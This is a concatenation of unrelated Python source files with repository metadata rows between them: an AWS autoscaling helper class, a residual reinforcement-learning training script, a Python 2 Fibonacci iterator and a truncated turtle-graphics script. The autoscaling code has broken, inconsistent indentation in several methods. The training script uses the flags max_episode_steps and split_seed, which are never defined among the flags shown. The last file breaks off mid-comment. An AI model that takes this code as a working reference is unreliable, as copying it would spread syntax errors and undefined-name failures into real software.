    self.boto3_autoscale = boto3_autoscaling_connection or boto3.client('autoscaling')
def get_groupname(self, hostclass):
    '''Returns the autoscaling group name when given a hostclass'''
    return "{0}_{1}".format(self.environment_name, hostclass)
def _filter_by_environment(self, items):
    '''Filters autoscaling groups and launch configs by environment'''
    return [
        item for item in items
        if item.name.startswith("{0}_".format(self.environment_name))
    ]

def _filter_instance_by_environment(self, items):
    # Same environment filter as above, but autoscaling instances carry
    # the group name in `group_name` rather than `name`.
    return [
        item for item in items
        if item.group_name.startswith("{0}_".format(self.environment_name))
    ]
def get_hostclass(self, groupname):
    '''Returns the hostclass when given an autoscaling group name'''
    prefix = self.environment_name + '_'
    # str.replace() would strip the environment prefix anywhere it
    # appears in the name; only remove it when it is the actual prefix.
    if groupname.startswith(prefix):
        return groupname[len(prefix):]
    return groupname
def _get_group_generator(self):
    '''Yields groups in current environment'''
    next_token = None
    while True:
        groups = throttled_call(self.connection.get_all_groups,
                                next_token=next_token)
        for group in self._filter_by_environment(groups):
            yield group
        # boto paginates results; keep fetching pages until there is no
        # continuation token left
        next_token = groups.next_token
        if not next_token:
            break

def get_groups(self):
    '''Returns Autoscaling groups in current environment'''
    return list(self._get_group_generator())
def _get_instance_generator(self, instance_ids=None):
    '''Yields autoscaled instances in current environment'''
    next_token = None
    while True:
        instances = throttled_call(
            self.connection.get_all_autoscaling_instances,
            instance_ids=instance_ids, next_token=next_token)
        for instance in self._filter_instance_by_environment(instances):
            yield instance
        # follow boto's pagination token until exhausted
        next_token = instances.next_token
        if not next_token:
            break

def get_instances(self, instance_ids=None):
    '''Returns autoscaled instances in the current environment'''
    return list(self._get_instance_generator(instance_ids=instance_ids))
def _get_config_generator(self, names=None):
    '''Yields Launch Configurations in current environment'''
    next_token = None
    while True:
        configs = throttled_call(self.connection.get_all_launch_configurations,
                                 names=names, next_token=next_token)
        for config in self._filter_by_environment(configs):
            yield config
        # follow boto's pagination token until exhausted
        next_token = configs.next_token
        if not next_token:
            break

def get_configs(self, names=None):
    '''Returns Launch Configurations in current environment'''
    return list(self._get_config_generator(names=names))

def get_config(self, *args, **kwargs):
    '''Returns a new launch configuration'''
    # creates the configuration in AWS as a side effect before returning
    config = boto.ec2.autoscale.launchconfig.LaunchConfiguration(
        connection=self.connection, *args, **kwargs
    )
    throttled_call(self.connection.create_launch_configuration, config)
    return config
def delete_config(self, config_name):
    '''Delete a specific Launch Configuration'''
    throttled_call(self.connection.delete_launch_configuration, config_name)

def clean_configs(self):
    '''Delete unused Launch Configurations in current environment'''
    for config in self._get_config_generator():
        try:
            self.delete_config(config.name)
        except BotoServerError:
            # best effort: configs still attached to a group cannot be
            # deleted -- skip rather than abort the sweep
            pass

def delete_group(self, hostclass, force=False):
    '''Delete a specific Autoscaling Group'''
    throttled_call(self.connection.delete_auto_scaling_group,
                   self.get_groupname(hostclass), force_delete=force)

def clean_groups(self, force=False):
    '''Delete unused Autoscaling Groups in current environment'''
    for group in self._filter_by_environment(self.get_groups()):
        try:
            self.delete_group(self.get_hostclass(group.name), force)
        except BotoServerError:
            # best effort: groups with live instances fail unless force
            pass
def scaledown_group(self, hostclass):
    '''Scales down number of instances in Autoscaling group to zero'''
    matches = throttled_call(self.connection.get_all_groups,
                             names=[self.get_groupname(hostclass)])
    if not matches:
        return
    group = matches[0]
    group.min_size = 0
    group.max_size = 0
    group.desired_capacity = 0
    throttled_call(group.update)
def has_group(self, hostclass):
    '''Returns True iff current environment has an autoscaling group for a hostclass'''
    # bool() on the result list replaces the clunkier `len(...) != 0`
    return bool(throttled_call(self.connection.get_all_groups,
                               names=[self.get_groupname(hostclass)]))
@staticmethod
def create_autoscale_tags(group_name, tags):
    '''Given a python dictionary return list of boto autoscale Tag objects'''
    # returns None for an empty/None dict; tags propagate to launched instances
    return [boto.ec2.autoscale.Tag(key=key, value=value, resource_id=group_name, propagate_at_launch=True)
            for key, value in tags.iteritems()] if tags else None
def update_group(self, group, launch_config, vpc_zone_id=None,
                 min_size=None, max_size=None, desired_size=None,
                 termination_policies=None, tags=None,
                 load_balancers=None):
    '''Update an existing autoscaling group'''
    # only overwrite attributes the caller actually supplied
    group.launch_config_name = launch_config
    if vpc_zone_id:
        group.vpc_zone_identifier = vpc_zone_id
    if min_size is not None:
        group.min_size = min_size
    if max_size is not None:
        group.max_size = max_size
    if desired_size is not None:
        group.desired_capacity = desired_size
    if termination_policies:
        group.termination_policies = termination_policies
    throttled_call(group.update)
    if tags:
        # existing tags are merged/overwritten, never deleted
        throttled_call(self.connection.create_or_update_tags,
                       DiscoAutoscale.create_autoscale_tags(group.name, tags))
    if load_balancers:
        # ELB attachment goes through boto3; detaching is not supported
        throttled_call(self.boto3_autoscale.attach_load_balancers,
                       AutoScalingGroupName=group.name,
                       LoadBalancerNames=load_balancers)
    return group
def create_group(self, hostclass, launch_config, vpc_zone_id,
                 min_size=None, max_size=None, desired_size=None,
                 termination_policies=None, tags=None,
                 load_balancers=None):
    '''
    Create an autoscaling group.

    The group must not already exist. Use get_group() instead if you want to update a group if it
    exits or create it if it does not.
    '''
    # normalise sizes: max covers every supplied bound, desired falls
    # back to max when not given
    _min_size = min_size or 0
    _max_size = max([min_size, max_size, desired_size, 0])
    _desired_capacity = desired_size or max_size
    termination_policies = termination_policies or DEFAULT_TERMINATION_POLICIES
    group_name = self.get_groupname(hostclass)
    group = boto.ec2.autoscale.group.AutoScalingGroup(
        connection=self.connection,
        name=group_name,
        launch_config=launch_config,
        load_balancers=load_balancers,
        default_cooldown=None,
        health_check_type=None,
        health_check_period=None,
        placement_group=None,
        vpc_zone_identifier=vpc_zone_id,
        desired_capacity=_desired_capacity,
        min_size=_min_size,
        max_size=_max_size,
        tags=DiscoAutoscale.create_autoscale_tags(group_name, tags),
        termination_policies=termination_policies,
        instance_id=None)
    throttled_call(self.connection.create_auto_scaling_group, group)
    return group
def get_group(self, hostclass, launch_config, vpc_zone_id=None,
              min_size=None, max_size=None, desired_size=None,
              termination_policies=None, tags=None,
              load_balancers=None):
    '''
    Returns autoscaling group.
    This updates an existing autoscaling group if it exists,
    otherwise this creates a new autoscaling group.

    NOTE: Deleting tags is not currently supported.
    NOTE: Detaching ELB is not currently supported.
    '''
    # upsert: delegate to update_group or create_group as appropriate
    group = self.get_existing_group(hostclass)
    if group:
        return self.update_group(
            group=group, launch_config=launch_config, vpc_zone_id=vpc_zone_id,
            min_size=min_size, max_size=max_size, desired_size=desired_size,
            termination_policies=termination_policies, tags=tags, load_balancers=load_balancers)
    else:
        return self.create_group(
            hostclass=hostclass, launch_config=launch_config, vpc_zone_id=vpc_zone_id,
            min_size=min_size, max_size=max_size, desired_size=desired_size,
            termination_policies=termination_policies, tags=tags, load_balancers=load_balancers)
def get_existing_group(self, hostclass):
    """Returns autoscaling group for a hostclass iff it already exists"""
    matches = throttled_call(self.connection.get_all_groups,
                             names=[self.get_groupname(hostclass)])
    if matches:
        return matches[0]
    return None
def terminate(self, instance_id, decrement_capacity=True):
    """
    Terminates an instance using the autoscaling API.

    When decrement_capacity is True this allows us to avoid
    autoscaling immediately replacing a terminated instance.
    """
    throttled_call(self.connection.terminate_instance,
                   instance_id, decrement_capacity=decrement_capacity)
def get_launch_config_for_hostclass(self, hostclass):
    """Returns an launch configuration for a hostclass if it exists, None otherwise"""
    group_list = throttled_call(self.connection.get_all_groups,
                                names=[self.get_groupname(hostclass)])
    if not group_list:
        return None
    # resolve the group's launch config name into the config object
    config_list = self.get_configs(names=[group_list[0].launch_config_name])
    return config_list[0] if config_list else None
def list_policies(self):
    """Returns all autoscaling policies"""
    return throttled_call(self.connection.get_all_policies)

def create_policy(self, policy_name, group_name, adjustment, cooldown):
    """Creates an autoscaling policy and associates it with an autoscaling group"""
    # ChangeInCapacity: `adjustment` is a +/- instance count delta
    policy = ScalingPolicy(name=policy_name, adjustment_type='ChangeInCapacity',
                           as_name=group_name, scaling_adjustment=adjustment, cooldown=cooldown)
    throttled_call(self.connection.create_scaling_policy, policy)

def delete_policy(self, policy_name, group_name):
    """Deletes an autoscaling policy"""
    return throttled_call(self.connection.delete_policy, policy_name, group_name)
def delete_all_recurring_group_actions(self, hostclass):
"""Deletes all recurring scheduled actions for a hostclass"""
as_group = self.get_groupname(hostclass)
actions = throttled_call(self.connection.get_all_scheduled_actions, as_group=as_group)
recurring_actions = [action for action in actions if action.recurrence is not None]
for action in recurring_actions:
throttled_call(self.connection.delete_scheduled_action,
scheduled_action_name=action.name, autoscale_group=as_group)
def create_recurring_group_action(self, hostclass, recurrance,
min_size=None, desired_capacity=None, max_size=None):
"""Creates a recurring scheduled action for a hostclass"""
as_group = self.get_groupname(hostclass)
action_name = "{0}_{1}".format(as_group, recurrance.replace('*', 'star').replace(' ', '_'))
throttled_call(self.connection.create_scheduled_group_action,
as_group=as_group, name=action_name,
min_size=min_size,
desired_capacity=desired_capacity,
max_size=max_size,
recurrence=recurrance)
@staticmethod
def _get_snapshot_dev(launch_config, hostclass):
snapshot_devs = [key for key, value in launch_config.block_device_mappings.iteritems()
if value.snapshot_id]
if not snapshot_devs:
raise Exception("Hostclass {0} does not mount a snapshot".format(hostclass))
elif len(snapshot_devs) > 1:
raise Exception("Unsupported configuration: hostclass {0} has multiple snapshot based devices."
.format(hostclass))
return snapshot_devs[0]
    def _create_new_launchconfig(self, hostclass, launch_config):
        # Clone an existing launch configuration under a fresh randomized name
        # (AWS launch configs are immutable, so changing any setting means
        # creating a new config and pointing the group at it).
        return self.get_config(
            name='{0}_{1}_{2}'.format(self.environment_name, hostclass, str(random.randrange(0, 9999999))),
            image_id=launch_config.image_id,
            key_name=launch_config.key_name,
            security_groups=launch_config.security_groups,
            # NOTE(review): wraps the mappings object in a one-element list --
            # presumably the API expects a list of mappings; confirm.
            block_device_mappings=[launch_config.block_device_mappings],
            instance_type=launch_config.instance_type,
            instance_monitoring=launch_config.instance_monitoring,
            instance_profile_name=launch_config.instance_profile_name,
            ebs_optimized=launch_config.ebs_optimized,
            user_data=launch_config.user_data,
            associate_public_ip_address=launch_config.associate_public_ip_address)
    def update_snapshot(self, hostclass, snapshot_id, snapshot_size):
        '''Updates an existing autoscaling group to use a different snapshot.

        Creates a new launch configuration pointing at snapshot_id (launch
        configs are immutable) and swaps the group over to it.  No-op when
        the group already references the given snapshot.
        '''
        launch_config = self.get_launch_config_for_hostclass(hostclass)
        if not launch_config:
            raise Exception("Can't locate hostclass {0}".format(hostclass))
        # The (single) snapshot-backed block device mapping for this config.
        snapshot_bdm = launch_config.block_device_mappings[
            DiscoAutoscale._get_snapshot_dev(launch_config, hostclass)]
        if snapshot_bdm.snapshot_id != snapshot_id:
            old_snapshot_id = snapshot_bdm.snapshot_id
            snapshot_bdm.snapshot_id = snapshot_id
            snapshot_bdm.size = snapshot_size
            # Point the existing group at a freshly-cloned launch config.
            self.update_group(self.get_existing_group(hostclass),
                              self._create_new_launchconfig(hostclass, launch_config).name)
            logging.info(
                "Updating %s group's snapshot from %s to %s", hostclass, old_snapshot_id, snapshot_id)
        else:
            logging.debug(
                "Autoscaling group %s is already referencing latest snapshot %s", hostclass, snapshot_id)
def update_elb(self, hostclass, elb_names):
'''Updates an existing autoscaling group to use a different set of load balancers'''
group = self.get_existing_group(hostclass)
if not group:
logging.warning("Auto Scaling group %s does not exist. Cannot change %s ELB(s)",
hostclass, ', '.join(elb_names))
return (set(), set())
new_lbs = set(elb_names) - set(group.load_balancers)
extras = set(group.load_balancers) - set(elb_names)
if new_lbs or extras:
logging.info("Updating %s group's elb from [%s] to [%s]",
hostclass, ", ".join(group.load_balancers), ", ".join(elb_names))
if new_lbs:
throttled_call(self.boto3_autoscale.attach_load_balancers,
AutoScalingGroupName=group.name,
LoadBalancerNames=list(new_lbs))
if extras:
throttled_call(self.boto3_autoscale.detach_load_balancers,
AutoScalingGroupName=group.name,
LoadBalancerNames=list(extras))
return (new_lbs, extras)
| 46.271978 | 110 | 0.657543 | 16,399 | 0.973639 | 1,484 | 0.088108 | 877 | 0.052069 | 0 | 0 | 2,889 | 0.171525 |
634b0fccab27c3552b1794373b64b0eabd3f0b1b | 17,621 | py | Python | rrlfd/residual/train.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-13T21:48:52.000Z | 2022-03-13T21:48:52.000Z | rrlfd/residual/train.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | null | null | null | rrlfd/residual/train.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-30T07:20:29.000Z | 2022-03-30T07:20:29.000Z | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Train a residual policy on top of a learned agent.
Usage:
Use case --> flags to set
1) Use base agent
a) Use feats from base agent --> network && bc_ckpt_to_load
b) Learn new feats --> network && bc_ckpt_to_load && rl_observation_network
c) Init feats from base agent but finetune
--> network && bc_ckpt_to_load && rl_observation_network
&& init_feats_from_bc && predict_residual
2) Use RL only
a) Learn new feats --> rl_observation_network (if input type is visual)
b) Init feats & policy from base agent but finetune
--> network && bc_ckpt_to_load && rl_observation_network && init_from_bc
c) Init feats from base agent but finetune
--> network && bc_ckpt_to_load && rl_observation_network
&& init_feats_from_bc
3) Use base controller + rl observation net from scratch
--> base_controller && rl_observation_network
"""
import os
from absl import app
from absl import flags
from acme import specs
import numpy as np
import tensorflow as tf
from rrlfd.residual import agents
from rrlfd.residual import eval_utils
from rrlfd.residual import setup
from tensorflow.io import gfile
flags.DEFINE_string('domain', None, 'Domain from which to load task.')
flags.DEFINE_string('task', None, 'Task to solve.')
flags.DEFINE_enum('input_type', 'depth', ['depth', 'rgb', 'rgbd', 'full_state'],
'Input modality.')
flags.DEFINE_integer('num_episodes', 10000, 'Number of episodes to run for.')
flags.DEFINE_integer('seed', 2, 'Experiment seed.')
flags.DEFINE_integer('eval_seed', 1, 'Environtment seed for evaluation.')
flags.DEFINE_boolean('increment_eval_seed', False,
'If True, increment eval seed after each eval episode.')
flags.DEFINE_integer('num_eval_episodes', 100,
'Number of episodes to evaluate.')
flags.DEFINE_boolean('collapse_in_eval', True,
'If True, collapse RL policy to its mean in evaluation.')
flags.DEFINE_boolean('stop_if_stuck', False,
'If True, end episode if observations and actions are '
'stuck.')
flags.DEFINE_boolean('end_on_success', False,
'If True, end episode early if success criteria is met.')
flags.DEFINE_integer('eval_freq', 100_000,
'Frequency (in environment training steps) with which to '
'evaluate policy.')
flags.DEFINE_boolean('eval_only', False,
'If True, evaluate policy ckpts of trained policy.')
# Flags for BC agent.
flags.DEFINE_boolean('binary_grip_action', True,
'If True, use open/close action space for gripper. Else '
'use gripper velocity.')
flags.DEFINE_enum('action_norm', 'unit', ['unit', 'zeromean_unitvar'],
'Which normalization to apply to actions.')
flags.DEFINE_enum('residual_action_norm', 'unit',
['none', 'unit', 'zeromean_unitvar', 'centered'],
'Which normalization to apply to residual actions.')
flags.DEFINE_float('residual_action_norm_scale', 1.0,
'Factor by which to scale residual actions. Applied to raw '
'predictions in none, unit and centered normalisation, and '
'to standard deviation in the case of zeromean_unitvar.')
flags.DEFINE_enum('signals_norm', 'none', ['none', 'unit', 'zeromean_unitvar'],
'Which normalization to apply to scalar observations.')
flags.DEFINE_string('original_demos_file', None,
'Dataset used to compute stats for action normalization.')
flags.DEFINE_integer('max_demos_to_load', None,
'Maximum number of demos from demos_file (in order) to '
'use to compute action stats.')
flags.DEFINE_integer('max_demo_length', None,
'If set, trim demonstrations to this length.')
flags.DEFINE_float('val_size', 0.05,
'Amount of data to exlude from action normalisation stats. '
'If < 1, the fraction of total loaded data points. Else the '
'number of data points.')
flags.DEFINE_boolean('val_full_episodes', True,
'If True, split data into train and validation on an '
'episode basis. Else split by individual time steps.')
flags.DEFINE_string('last_activation', None,
'Activation function to apply to network output, if any.')
flags.DEFINE_list('fc_layer_sizes', [],
'Sizes of fully connected layers to add on top of bottleneck '
'layer, if any.')
flags.DEFINE_integer('num_input_frames', 3,
'Number of frames to condition base policy on.')
flags.DEFINE_integer('image_size', None, 'Size of rendered images.')
flags.DEFINE_integer('crop_margin_size', 16,
'If crop_frames is True, the number of pixels to crop '
'from each dimension.')
flags.DEFINE_boolean('crop_frames', True,
'If True, crop input frames by 16 pixels in H and W.')
flags.DEFINE_list('target_offsets', [0, 10, 20, 30],
'Offsets in time for actions to predict in behavioral '
'cloning.')
flags.DEFINE_enum('network', None,
['resnet18', 'resnet18_narrow32', 'resnet50', 'simple_cnn',
'hand_vil'],
'Policy network of base policy.')
flags.DEFINE_boolean('bn_before_concat', False,
'If True, add a batch norm layer before concatenating '
'scalar featuses to visual features.')
flags.DEFINE_float('weight_decay', 5e-4, 'Weight decay for training.')
flags.DEFINE_boolean('predict_residual', True,
'If True, train a residual agent. Else train RL from '
'scratch without base agent.')
flags.DEFINE_enum('rl_observation_network', None,
['resnet18', 'resnet18_narrow32', 'resnet50', 'simple_cnn',
'hand_vil'],
'Observation network of residual policy. If None, '
'observation network of base agent is reused.')
flags.DEFINE_boolean('late_fusion', False,
'If True, fuse stacked frames after convolutional layers. '
'If False, fuse at network input.')
flags.DEFINE_string('policy_init_path', None,
'If set, initialize network weights from a pickle file at '
'this path.')
flags.DEFINE_string('rl_observation_network_ckpt', None,
'If set, checkpoint from which to load observation network '
'weights.')
flags.DEFINE_string('base_controller', None,
'If set, a black-box controller to use for base actions.')
flags.DEFINE_string('bc_ckpt_to_load', None,
'If set, checkpoint from which to load base policy.')
flags.DEFINE_string('rl_ckpt_to_load', None,
'If set, checkpoint from which to load residual policy.')
flags.DEFINE_string('original_demos_path', None,
'If set, path to the original demonstration dataset (to '
'restore normalization statistics). If not set, inferred '
'from BC checkpoint path.')
flags.DEFINE_boolean('init_from_bc', False,
'If True, use BC agent loaded from bc_ckpt_to_load as '
'initialization for RL observation and policy nets.')
flags.DEFINE_boolean('init_feats_from_bc', False,
'If True, initialize RL observation network with BC.')
flags.DEFINE_string('logdir', None, 'Location to log results to.')
flags.DEFINE_boolean('load_saved', False,
'If True, load saved model from checkpoint. Else train '
'from scratch.')
flags.DEFINE_string('base_visible_state', 'robot',
'State features on which to condition the base policy.')
flags.DEFINE_string('residual_visible_state', 'robot',
'State features on which to condition the residual policy. '
'If using full state, the BC net features are replaced '
'with these true state features in input to RL policy.')
flags.DEFINE_float('bernoulli_rate', 0.,
'Fraction of time to use bernoulli exploration for gripper '
'action.')
flags.DEFINE_float('sticky_rate', 0.,
'Stickiness rate of bernoulli exploration for gripper '
'action.')
flags.DEFINE_string('job_id', None,
'Subdirectory to add to logdir to identify run. Set '
'automatically to XM id or datetime if None.')
flags.DEFINE_integer('base_policy_success', None,
'No-op flag used to identify base policy.')
flags.DEFINE_boolean('freeze_rl_observation_network', False,
'If True, do not update acme observation network weights. '
'Else train critic and observation net jointly.')
FLAGS = flags.FLAGS
def train_residual(
    env_loop, num_episodes, logdir, eval_freq, num_eval_episodes,
    collapse_in_eval, eval_seed, increment_eval_seed, stop_if_stuck):
  """Train the residual policy by running env_loop for num_episodes.

  Checkpoints and evaluates periodically; when logdir is set, the final
  acme agent is saved there.  Returns the total environment step count.
  """
  # TODO(minttu): Should bernoulli rate and sticky rate be defined here instead?
  ckpt_interval = min(50_000, eval_freq)
  step_count = env_loop.run(
      num_episodes=num_episodes,
      out_dir=logdir,
      ckpt_freq=ckpt_interval,
      eval_freq=eval_freq,
      num_eval_episodes=num_eval_episodes,
      collapse_in_eval=collapse_in_eval,
      eval_seed=eval_seed,
      increment_eval_seed=increment_eval_seed,
      stop_if_stuck=stop_if_stuck)
  if logdir is not None:
    setup.save_acme_agent(env_loop.actor, logdir)
  return step_count
def main(_):
  """Set up env, agents and loggers per FLAGS, then train and/or evaluate."""
  np.random.seed(FLAGS.seed)
  tf.random.set_seed(FLAGS.seed)
  counter = setup.setup_counting()
  logdir, env_logger, agent_logger, summary_writer, _ = setup.setup_logging(
      FLAGS.logdir)
  base_state = setup.set_visible_features(
      FLAGS.domain, FLAGS.task, FLAGS.base_visible_state)
  residual_state = setup.set_visible_features(
      FLAGS.domain, FLAGS.task, FLAGS.residual_visible_state)
  print('Base policy state features', base_state)
  print('Residual policy state features', residual_state)
  image_size = FLAGS.image_size
  if image_size is None:
    # Default sizes.
    image_size = {
        'adroit': 128,
        'mime': 240,
    }[FLAGS.domain]
  # Whether BCAgent's network is used for visual features (expects frames in a
  # certain shape).
  use_base_agent_image_shape = (
      FLAGS.predict_residual or FLAGS.freeze_rl_observation_network)
  visible_state = (
      list(set(base_state + residual_state)) if FLAGS.predict_residual
      else residual_state)
  env_loop = setup.make_environment_loop(
      domain=FLAGS.domain,
      task=FLAGS.task,
      seed=FLAGS.seed,
      input_type=FLAGS.input_type,
      num_input_frames=FLAGS.num_input_frames,
      visible_state=visible_state,
      image_size=image_size,
      use_base_agent_image_shape=use_base_agent_image_shape,
      late_fusion=FLAGS.late_fusion,
      max_train_episode_steps=FLAGS.max_episode_steps,
      agent=None,
      counter=counter,
      env_logger=env_logger,
      summary_writer=summary_writer)
  env = env_loop._environment  # pylint: disable=protected-access
  environment_spec = specs.make_environment_spec(env)
  print('Environment spec', environment_spec)

  base_agent = None
  # Create BC agent. In residual RL, it is used as the base agent, and in
  # standalone RL it may be used for action and observation space normalization.
  if FLAGS.bc_ckpt_to_load or FLAGS.original_demos_file:
    base_agent = setup.load_saved_bc_agent(
        ckpt_to_load=FLAGS.bc_ckpt_to_load,
        network_type=FLAGS.network,
        late_fusion=FLAGS.late_fusion,
        input_type=FLAGS.input_type,
        domain=FLAGS.domain,
        binary_grip_action=FLAGS.binary_grip_action,
        num_input_frames=FLAGS.num_input_frames,
        crop_frames=FLAGS.crop_frames,
        full_image_size=image_size,
        crop_margin_size=FLAGS.crop_margin_size,
        target_offsets=[int(t) for t in FLAGS.target_offsets],
        visible_state_features=base_state,
        action_norm=FLAGS.action_norm,
        signals_norm=FLAGS.signals_norm,
        last_activation=FLAGS.last_activation,
        fc_layer_sizes=[int(i) for i in FLAGS.fc_layer_sizes],
        weight_decay=FLAGS.weight_decay,
        max_demos_to_load=FLAGS.max_demos_to_load,
        max_demo_length=FLAGS.max_demo_length,
        val_size=FLAGS.val_size,
        val_full_episodes=FLAGS.val_full_episodes,
        split_seed=FLAGS.split_seed,
        env=env,
        task=FLAGS.task)
    print('action normalization mean\n', base_agent.action_space.mean)
    print('action normalization std\n', base_agent.action_space.std)

  # Decide whether the RL side learns its own observation network or reuses
  # the base agent's visual features (see module docstring for the cases).
  obs_network_type = None
  include_base_feats = True
  if ((FLAGS.bc_ckpt_to_load is None and FLAGS.policy_init_path is None)
      or (FLAGS.init_from_bc and not FLAGS.freeze_rl_observation_network)
      or FLAGS.init_feats_from_bc):
    obs_network_type = FLAGS.rl_observation_network
    include_base_feats = False
  if FLAGS.residual_visible_state == 'full':
    # Full true state replaces BC features in the RL policy input.
    include_base_feats = False
  include_base_action = FLAGS.predict_residual

  residual_spec = setup.define_residual_spec(
      residual_state, env, base_agent,
      action_norm=FLAGS.residual_action_norm,
      action_norm_scale=FLAGS.residual_action_norm_scale,
      include_base_action=include_base_action,
      include_base_feats=include_base_feats,
      base_network=FLAGS.network)

  binary_grip_action = FLAGS.init_from_bc and FLAGS.binary_grip_action
  residual_agent, eval_policy = setup.make_acme_agent(
      environment_spec=environment_spec,
      residual_spec=residual_spec,
      obs_network_type=obs_network_type,
      crop_frames=FLAGS.crop_frames,
      full_image_size=image_size,
      crop_margin_size=FLAGS.crop_margin_size,
      late_fusion=FLAGS.late_fusion,
      binary_grip_action=binary_grip_action,
      input_type=FLAGS.input_type,
      counter=counter,
      logdir=logdir,
      agent_logger=agent_logger)
  # Optionally warm-start the RL policy / observation nets from the BC agent.
  if FLAGS.init_from_bc:
    setup.init_policy_networks(base_agent.network, residual_agent)
    if not FLAGS.freeze_rl_observation_network:
      setup.init_observation_networks(base_agent.network, residual_agent)
  if FLAGS.init_feats_from_bc:
    setup.init_observation_networks(base_agent.network, residual_agent)

  # Choose the wrapper agent: residual on top of the base agent, or
  # standalone RL (with optionally frozen observation features).
  if FLAGS.predict_residual:
    agent_class = agents.ResidualAgent
  else:
    if FLAGS.freeze_rl_observation_network:
      agent_class = agents.FixedObservationAgent
    else:
      agent_class = agents.RLAgent
  agent = agent_class(
      base_agent=base_agent,
      rl_agent=residual_agent,
      action_space='tool_lin' if FLAGS.domain == 'mime' else FLAGS.task,
      action_norm=FLAGS.residual_action_norm,
      action_norm_scale=FLAGS.residual_action_norm_scale,
      signals_norm=FLAGS.signals_norm,
      rl_eval_policy=eval_policy,
      feats_spec=residual_spec.observations,
      state_keys=residual_state,
      bernoulli_rate=FLAGS.bernoulli_rate,
      sticky_rate=FLAGS.sticky_rate,
      rl_observation_network_type=FLAGS.rl_observation_network,
      rl_input_type=FLAGS.input_type,
      rl_num_input_frames=FLAGS.num_input_frames,
      base_controller=FLAGS.base_controller,
      env=env)
  env_loop.actor = agent

  if FLAGS.eval_only:
    # Evaluate every saved policy checkpoint found in logdir.
    ckpts = gfile.Glob(os.path.join(logdir, 'policy_*.index'))
    print(os.path.join(logdir, 'policy_*.index'))
    print(ckpts)
    for ckpt in ckpts:
      ckpt = ckpt.replace('.index', '')
      loaded_steps = setup.load_agent(agent, ckpt)
      total_steps = loaded_steps
      eval_utils.eval_agent(
          env_loop, FLAGS.task, FLAGS.eval_seed, FLAGS.increment_eval_seed,
          FLAGS.num_eval_episodes, loaded_steps, FLAGS.collapse_in_eval,
          FLAGS.stop_if_stuck, FLAGS.num_episodes, total_steps, logdir,
          summary_writer=None, eval_id='late')
  else:
    if FLAGS.rl_ckpt_to_load is None:
      # Train from scratch, then evaluate the final policy below.
      total_steps = train_residual(
          env_loop, FLAGS.num_episodes, logdir, FLAGS.eval_freq,
          FLAGS.num_eval_episodes, FLAGS.collapse_in_eval, FLAGS.eval_seed,
          FLAGS.increment_eval_seed, FLAGS.stop_if_stuck)
      loaded_steps = 'final'
    else:
      # Skip training; evaluate a specific checkpoint instead.
      loaded_steps = setup.load_agent(agent, FLAGS.rl_ckpt_to_load)
      total_steps = loaded_steps
      logdir = os.path.dirname(FLAGS.rl_ckpt_to_load)
    eval_utils.eval_agent(
        env_loop, FLAGS.task, FLAGS.eval_seed, FLAGS.increment_eval_seed,
        FLAGS.num_eval_episodes, loaded_steps, FLAGS.collapse_in_eval,
        FLAGS.stop_if_stuck, FLAGS.num_episodes, total_steps, logdir,
        summary_writer)
if __name__ == '__main__':
  # absl parses the flags defined above before dispatching to main().
  app.run(main)
| 43.616337 | 80 | 0.684524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,925 | 0.392997 |
634b7d80c5c9288d78d5d9a43bb5596a0c00f3ab | 438 | py | Python | doc/python_study_code/fibc.py | beiliwenxiao/vimrc | eb38fc769f3f5f78000060dac674b5c49d63c24c | [
"MIT"
] | null | null | null | doc/python_study_code/fibc.py | beiliwenxiao/vimrc | eb38fc769f3f5f78000060dac674b5c49d63c24c | [
"MIT"
] | null | null | null | doc/python_study_code/fibc.py | beiliwenxiao/vimrc | eb38fc769f3f5f78000060dac674b5c49d63c24c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
__metaclass__ = type
class Fibs:
    """Infinite iterator over the Fibonacci numbers (1, 1, 2, 3, 5, ...)."""

    def __init__(self):
        # a is the last yielded value, b is the next one to yield.
        self.a = 0
        self.b = 1

    def next(self):
        """Advance the sequence and return the next Fibonacci number."""
        self.a, self.b = self.b, self.a + self.b
        return self.a

    # Alias so the iterator protocol also works under Python 3, where the
    # dunder is named __next__ (the original was Python 2 only).
    __next__ = next

    def __iter__(self):
        return self
fibs = Fibs()
# Print Fibonacci numbers until the first one exceeding 25 digits.
# NOTE: Python 2 only -- relies on the long-literal 'L' suffix and the
# print statement; neither parses under Python 3.
for f in fibs:
    if f > 9999999999999999999999999L:
        print 'End Numbers is:',f
        break
    else:
        print f
634dbb7f297045c79fe90538f214e33393d57c93 | 517 | py | Python | Python/turtle_drawer_seanyboi.py | nskesav/Hacktoberfest-Beginner-level | 7f834acb0fd3d4556fb2696a2a7d1e82307f0baf | [
"MIT"
] | 59 | 2019-10-03T07:02:22.000Z | 2021-09-30T18:24:10.000Z | Python/turtle_drawer_seanyboi.py | nskesav/Hacktoberfest-Beginner-level | 7f834acb0fd3d4556fb2696a2a7d1e82307f0baf | [
"MIT"
] | 94 | 2019-10-03T06:58:50.000Z | 2020-09-30T08:08:45.000Z | Python/turtle_drawer_seanyboi.py | nskesav/Hacktoberfest-Beginner-level | 7f834acb0fd3d4556fb2696a2a7d1e82307f0baf | [
"MIT"
] | 267 | 2019-10-03T07:09:30.000Z | 2021-09-30T18:24:11.000Z | # draws a shape and fills with a colour
import turtle
import math
import colorsys
phi = 180 * (3 - math.sqrt(5))
# initialises the turtle Pen
t = turtle.Pen()
t.speed()
# defines the shape to be drawn
def square(t, size):
    """Trace a square with side length ``size`` using turtle pen ``t``."""
    for _ in range(4):
        t.forward(size)
        t.right(90)
num = 200
# Draw concentric rotated squares from large to small, cycling the fill
# colour through the HSV hue wheel for a rainbow spiral effect.
# NOTE(review): x/num relies on Python 3 true division to produce a
